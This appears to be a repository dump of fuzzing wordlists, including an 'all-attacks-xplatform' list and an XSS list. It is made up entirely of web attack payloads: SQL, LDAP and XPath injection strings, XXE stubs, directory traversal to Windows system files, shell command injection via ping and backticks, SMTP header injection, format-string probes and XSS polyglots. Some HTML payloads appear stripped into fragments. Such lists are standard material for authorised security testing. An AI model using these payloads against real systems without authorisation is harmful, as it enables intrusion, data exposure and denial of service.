| ' or (EXISTS) 364 | ' (select top 1 365 | '||UTL_HTTP.REQUEST 366 | 1;SELECT%20* 367 | to_timestamp_tz 368 | tz_offset 369 | <>"'%;)(&+ 370 | '%20or%201=1 371 | %27%20or%201=1 372 | %20$(sleep%2050) 373 | %20'sleep%2050' 374 | char%4039%41%2b%40SELECT 375 | '%20OR 376 | 'sqlattempt1 377 | (sqlattempt2) 378 | | 379 | %7C 380 | *| 381 | %2A%7C 382 | *(|(mail=*)) 383 | %2A%28%7C%28mail%3D%2A%29%29 384 | *(|(objectclass=*)) 385 | %2A%28%7C%28objectclass%3D%2A%29%29 386 | ( 387 | %28 388 | ) 389 | %29 390 | & 391 | %26 392 | ! 393 | %21 394 | ' or 1=1 or ''=' 395 | ' or ''=' 396 | x' or 1=1 or 'x'='y 397 | / 398 | // 399 | //* 400 | */* 401 | @* 402 | count(/child::node()) 403 | x' or name()='username' or 'x'='y 404 | ','')); phpinfo(); exit;/* 405 | var n=0;while(true){n++;}]]> 406 | SCRIPT]]>alert('XSS');/SCRIPT]]> 407 | SCRIPT]]>alert('XSS');/SCRIPT]]> 408 | 409 | ]>&xxe; 410 | ]>&xxe; 411 | ]>&xxe; 412 | ]>&xxe; 413 | ]]> 414 | <IMG SRC="javascript:alert('XSS')"> 415 | 416 | XSS 417 | 418 | ' 419 | '-- 420 | ' or 1=1-- 421 | 1 or 1=1-- 422 | ' or 1 in (@@version)-- 423 | 1 or 1 in (@@version)-- 424 | '; waitfor delay '0:30:0'-- 425 | 1; waitfor delay '0:30:0'-- 426 | '||Utl_Http.request('http://') from dual-- 427 | 1||Utl_Http.request('http://') from dual-- 428 | xsstest 429 | xsstest%00"<>' 430 | 431 | 432 | )))))))))) 433 | ../../../../../../../../../../boot.ini 434 | ..\..\..\..\..\..\..\..\..\..\boot.ini 435 | ../../../../../../../../../../windows/win.ini 436 | ..\..\..\..\..\..\..\..\..\..\windows\win.ini 437 | || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & 438 | | ping -i 30 127.0.0.1 | 439 | | ping -n 30 127.0.0.1 | 440 | & ping -i 30 127.0.0.1 & 441 | & ping -n 30 127.0.0.1 & 442 | ; ping 127.0.0.1 ; 443 | %0a ping -i 30 127.0.0.1 %0a 444 | `ping 127.0.0.1` 445 | ;echo 111111 446 | echo 111111 447 | response.write 111111 448 | :response.write 111111 449 | http:/// 450 | %0aCc: 451 | %0d%0aCc: 452 | %0aBcc: 453 | %0d%0aBcc: 454 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a 455 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a 456 | # known cross platform source Code, file disclosure attack patterns - append after file or dir path 457 | %70 458 | .%E2%73%70 459 | %2e0 460 | %2e 461 | . 462 | \ 463 | ?* 464 | %20 465 | %00 466 | %2f 467 | %5c 468 | count(/child::node()) 469 | x' or name()='username' or 'x'='y 470 | var n=0;while(true){n++;}]]> 471 | SCRIPT]]>alert('XSS');/SCRIPT]]> 472 | "SCRIPT]]>alert('XSS');/SCRIPT]]>" 473 | "" 474 | "]>&xxe;" 475 | "]>&xxe;" 476 | "]>&xxe;" 477 | "]>&xxe;" 478 | "]]>" 479 | "cript:alert('XSS')"">" 480 | "" 481 | "XSS" 482 | %00 483 | NULL 484 | null 485 | ' 486 | " 487 | ; 488 | 498 | "> 499 | %0d 500 | %0a 501 | %7f 502 | %ff 503 | -1 504 | other 505 | %s%p%x%d 506 | %99999999999s 507 | %08x 508 | %20d 509 | %20n 510 | %20x 511 | %20s 512 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d 513 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i 514 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o 515 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u 516 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x 517 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X 518 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a 519 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A 520 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 521 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E 522 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f 523 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F 524 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g 525 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G 526 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 527 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p 528 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% 529 | XXXXX.%p 530 | XXXXX`perl -e 'print ".%p" x 80'` 531 | `perl -e 'print ".%p" x 80'`%n 532 | -------------------------------------------------------------------------------- /fuzzfull/all-attacks-xplatform.txt: -------------------------------------------------------------------------------- 1 | !' 2 | !@#$%%^#$%#$@#$%$$@#$%^^**(() 3 | !@#0%^#0##018387@#0^^**(() 4 | ">]]> 43 | 44 | 45 | ]>&xee; 46 | ]>&xee; 47 | ]>&xee; 48 | ]>&xee; 49 | 50 | SCRIPT]]>alert('gotcha');/SCRIPT]]> 51 | ','')); phpinfo(); exit;/* 52 | 0 53 | 0.00005 54 | 0.1 55 | 0.9 56 | 1 57 | -1 58 | 1.7976931348623157e+308 59 | 5e-10 60 | 5e-324 61 | count(/child::node()) 62 | false 63 | null 64 | true 65 | x' or 1=1 or 'x'='y 66 | x' or name()='username' or 'x'='y 67 | -------------------------------------------------------------------------------- /xss.txt: -------------------------------------------------------------------------------- 1 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode 2 | //-->">'> 3 | '';!--"=&{()} 4 | 5 | 6 | 7 | "> 8 | 9 | < 10 | 11 | \";alert('XSS');// 12 | 13 |
14 |
15 |
16 |
17 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e 18 | /*-/*`/*\`/*'/*"/**/ 19 | (/* */oNcliCk=alert() ) 20 | //%0D%0A%0D%0A// 21 | 22 | \x3csVg/\x3e 23 | 24 | 25 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* 26 | click me 27 | click me 28 | 29 | \x3csVg/\x3e--> 30 | \x3csVg/\x3e 31 | 32 |
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e
33 | var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e"; 34 | var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e'; 35 | 36 | 37 | setTimeout(location.search.slice(1)); 38 | jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E 39 | var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.documentElement.innerHTML = data; 40 | var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.head.outerHTML = data; 41 | var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.write(data);document.close(); 42 | '"onclick=(co\u006efirm)?.`0`>

%22%3E%3CSvg/onload=confirm`3`//